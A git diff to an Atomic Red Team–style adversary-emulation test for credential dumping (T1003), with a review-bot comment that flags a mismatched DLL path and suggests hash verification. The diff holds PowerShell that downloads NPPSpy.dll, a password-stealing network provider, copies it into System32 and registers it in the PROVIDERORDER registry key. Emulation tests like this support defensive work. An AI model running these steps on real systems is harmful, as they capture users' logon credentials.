diff --git a/.gitignore b/.gitignore
index f922dab5..c86d1c76 100644
--- a/.gitignore
+++ b/.gitignore
@@ -57,4 +57,7 @@ override.tf.json
 .terraformrc
 terraform.rc
-*.pyc
\ No newline at end of file
+*.pyc
+
+# The ExternalPayloads folder
+ExternalPayloads
diff --git a/atomics/T1003/T1003.yaml b/atomics/T1003/T1003.yaml
index 5d7c6fec..d9121d50 100644
--- a/atomics/T1003/T1003.yaml
+++ b/atomics/T1003/T1003.yaml
@@ -58,14 +58,15 @@ atomic_tests:
 - windows
 dependency_executor_name: powershell
 dependencies:
-- description: NPPSpy.dll must be available in local temp directory
-prereq_command: if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1}
+- description: NPPSpy.dll must be available in ExternalPayloads directory
+prereq_command: if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\NPPSPY.dll") {exit 0} else {exit 1}
 get_prereq_command: |-
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "$env:Temp\NPPSPY.dll"
+New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "PathToAtomicsFolder\..\ExternalPayloads\NPPSPY.dll"
 executor:
 command: |-
-Copy-Item "$env:Temp\NPPSPY.dll" -Destination "C:\Windows\System32"
+Copy-Item "PathToAtomicsFolder\ExternalPayloads\NPPSPY.dll" -Destination "C:\Windows\System32"
 $path = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
 $UpdatedValue = $Path.PROVIDERORDER + ",NPPSpy"
 Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue
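Review bot: The new executor `Copy-Item` source path `PathToAtomicsFolder\ExternalPayloads\NPPSPY.dll` does not match the path the new prereq_command checks and the new get_prereq_command downloads to, which is `PathToAtomicsFolder\..\ExternalPayloads\NPPSPY.dll` (one level above the atomics folder, consistent with the root-level `ExternalPayloads` entry added to .gitignore in the first hunk). With this mismatch the prerequisite check passes but the copy fails at run time, and because the following `Get-ItemProperty`/`Set-ItemProperty` lines are not conditioned on the copy succeeding, the PROVIDERORDER value is still appended with `,NPPSpy` and left referencing a provider that was never placed, complicating cleanup and making the test result misleading. The source should be `Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\NPPSPY.dll" -Destination "C:\Windows\System32"`. Separately, the download is pinned to a specific upstream commit but the DLL's integrity is not verified before it is copied into System32; a hash check against a value recorded in the test (placeholder: `<EXPECTED_SHA256>`) would be a worthwhile hardening of the get_prereq_command, though that behaviour predates this change.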